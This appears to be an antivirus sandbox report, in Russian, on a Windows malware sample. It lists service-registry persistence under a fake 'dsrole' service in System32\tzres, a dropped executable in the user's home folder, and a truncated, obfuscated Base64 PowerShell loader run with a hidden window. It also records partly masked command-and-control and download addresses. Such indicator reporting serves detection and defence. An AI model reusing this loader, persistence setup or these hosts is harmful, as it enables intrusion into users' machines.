Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dsrole] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dsrole] 'ImagePath' = '"<SYSTEM32>\tzres\dsrole.exe"'
- 'dsrole' "<SYSTEM32>\tzres\dsrole.exe"
- 'dsrole' <SYSTEM32>\tzres\dsrole.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAMQAzADkAeQA3AD0AKAAnAFUAJwArACgAJwBpACcAKwAnAG4AaQAnACsAJwB6AG0AZAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgBWADoAdQBTAEUAcgBQAFIAbwBmAGkAbABFAFwAaAB1AF...
- %HOMEPATH%\huzc0_y\itvc3nd\r1jrp8.exe
- <SYSTEM32>\tzres\dsrole.exe
- %HOMEPATH%\huzc0_y\itvc3nd\r1jrp8.exe в <SYSTEM32>\tzres\dsrole.exe
- '18#.#15.227.107':443
- http://xn####qumz1h0h.com/wp-content/zj/
- http://18#.##5.227.107:443/oi9eSEeN0EeK8/gdzlrXnzzvcMaeR/beWdN2z/WGO2sXcs0fGKb/6EnNg8ZvAUXj/ucyG2Ib8f1/ via 18#.#15.227.107
- DNS ASK xn####qumz1h0h.com
- '%HOMEPATH%\huzc0_y\itvc3nd\r1jrp8.exe'
- '<SYSTEM32>\tzres\dsrole.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAMQAzADkAeQA3AD0AKAAnAFUAJwArACgAJwBpACcAKwAnAG4AaQAnACsAJwB6AG0AZAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgBWADoAdQBTAEUAcgBQAFIAbwBmAGkAbABFAFwAaAB1AF...' (со скрытым окном)